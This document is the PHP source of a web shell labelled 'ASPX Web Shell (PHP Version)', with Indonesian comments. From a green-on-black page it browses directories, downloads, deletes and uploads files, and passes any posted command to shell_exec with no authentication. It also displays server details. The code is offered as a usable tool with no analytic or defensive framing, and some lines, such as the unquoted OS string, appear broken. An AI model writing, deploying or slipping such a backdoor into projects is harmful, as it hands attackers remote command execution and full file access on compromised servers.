error_reporting(E_ALL);
ini_set('display_errors', 1);

// Tentukan direktori awal
$dir = __DIR__ . "/";
if (isset($_GET['fdir']) && !empty($_GET['fdir'])) {
$dir = $_GET['fdir'] . "/";
}
$dir = str_replace(array("\\", "//"), array("/", "/"), $dir);

// Informasi Server
$serverIP = gethostbyname(gethostname());
$serverName = gethostname();
$serverOS = Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64;
$serverUser = get_current_user();

// Buat navigasi direktori
$dirparts = explode('/', $dir);
$linkwalk = "";
$navLinks = "";
foreach ($dirparts as $curpart) {
if (strlen($curpart) == 0) continue;
$linkwalk .= $curpart . "/";
$navLinks .= "<a href='?fdir=" . urlencode($linkwalk) . "'>" . htmlspecialchars($curpart) . "/</a>&nbsp;";
}

// Daftar drive
$driveLinks = "";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
// Untuk Windows, periksa drive A-Z
foreach (range('A', 'Z') as $letter) {
$driveRoot = $letter . ":";
if (is_dir($driveRoot . "/")) {
$driveLinks .= "<a href='?fdir=" . urlencode($driveRoot) . "'>" . htmlspecialchars($driveRoot) . "</a>&nbsp;";
}
}
} else {
// Untuk non-Windows, tampilkan root
$driveLinks = "<a href='?fdir=/'>/</a>&nbsp;";
}

// Tangani pengunduhan file
if (isset($_GET['get']) && !empty($_GET['get'])) {
$getFile = $_GET['get'];
if (file_exists($getFile)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($getFile) . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($getFile));
readfile($getFile);
exit;
}
}

// Tangani penghapusan file
if (isset($_GET['del']) && !empty($_GET['del'])) {
$delFile = $_GET['del'];
if (file_exists($delFile)) {
unlink($delFile);
}
}

// Tangani upload file
if (isset($_FILES['flUp']) && $_FILES['flUp']['error'] == UPLOAD_ERR_OK) {
$fileName = $_FILES['flUp']['name'];
// Hilangkan path jika ada
$splitAt = strrpos($fileName, '/');
if ($splitAt === false) {
$splitAt = strrpos($fileName, '\\');
}
if ($splitAt !== false) {
$fileName = substr($fileName, $splitAt + 1);
}
move_uploaded_file($_FILES['flUp']['tmp_name'], $dir . $fileName);
}

// Buat daftar isi direktori
$dirOut = "";
if (is_dir($dir)) {
$entries = scandir($dir);
foreach ($entries as $entry) {
if ($entry == '.' || $entry == '..') continue;
$fullPath = $dir . $entry;
if (is_dir($fullPath)) {
$fstr = "<a href='?fdir=" . urlencode($dir . $entry) . "'>" . htmlspecialchars($entry) . "</a>";
$dirOut .= "$fstr&lt;DIR&gt;";
} elseif (is_file($fullPath)) {
$fstr = "<a href='?get=" . urlencode($dir . $entry) . "' target='_blank'>" . htmlspecialchars($entry) . "</a>";
$astr = "<a href='?fdir=" . urlencode($dir) . "&del=" . urlencode($dir . $entry) . "'>Delete</a>";
$sizeKB = round(filesize($fullPath) / 1024);
$dirOut .= "$fstr$sizeKB KB$astr";
}
}
}

// Tangani eksekusi perintah shell
$cmdOut = "";
if (isset($_POST['txtCmdIn']) && strlen(trim($_POST['txtCmdIn'])) > 0) {
$command = $_POST['txtCmdIn'];
// Menjalankan perintah. Pada Windows menggunakan cmd.exe
$output = shell_exec("cmd.exe /c " . $command);
$cmdOut = "<span class='typing'>" . htmlspecialchars($output) . "</span>";
// Reset nilai input jika diperlukan
$_POST['txtCmdIn'] = "";
}

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
ASPX Web Shell (PHP Version) <title>ASPX Web Shell (PHP Version)</title>
<style>
* { font-family: 'Courier New', monospace; font-size: 14px; }
body {
background: #000;
color: #0f0;
text-shadow: 0 0 5px #0f0;
margin: 20px;
}
a { color: #0f0; text-decoration: none; }
a:hover { color: #ff0; text-shadow: 0 0 10px #ff0; }
h1 {
font-size: 22px;
text-align: center;
border-bottom: 2px solid #0f0;
padding-bottom: 5px;
text-shadow: 0 0 10px #0f0;
}
h2 {
font-size: 16px;
border-bottom: 1px dashed #0f0;
padding-bottom: 3px;
text-align: center;
}
.section {
border: 1px solid #0f0;
padding: 10px;
margin-bottom: 10px;
border-radius: 5px;
background: rgba(0, 255, 0, 0.1);
}
th { text-align: left; border-bottom: 1px solid #0f0; padding: 5px; }
td { padding: 5px; }
pre {
background: #111;
padding: 10px;
border-radius: 5px;
font-size: 13px;
white-space: pre-wrap;
}
input, button {
background: black;
color: #0f0;
border: 1px solid #0f0;
padding: 5px;
font-size: 14px;
}
button:hover { background: #0f0; color: black; }
</style>


ASPX Web Shell (PHP Version)


<p>Server Information:</p>
<ul>
<li>Server IP: echo $serverIP; </li>
<li>Server Name: echo $serverName; </li>
<li>OS: echo $serverOS; </li>
<li>User: echo $serverUser; </li>
</ul>

<!-- Gunakan enctype multipart/form-data untuk upload file -->

<div class="section">

Shell Commands



<button type="submit" name="cmdExec">Execute</button>
<pre> echo $cmdOut; </pre>
</div>

<div class="section">

File Browser


<p>Drives: echo $driveLinks; </p>
<p>Directory: echo $navLinks; </p>
<table style="width: 100%">

<th>Name</th>
<th>Size KB</th>
<th>Actions</th>

echo $dirOut;

<p>Upload File:<br />

<button type="submit" name="cmdUpload">Upload</button>
</p>
</div>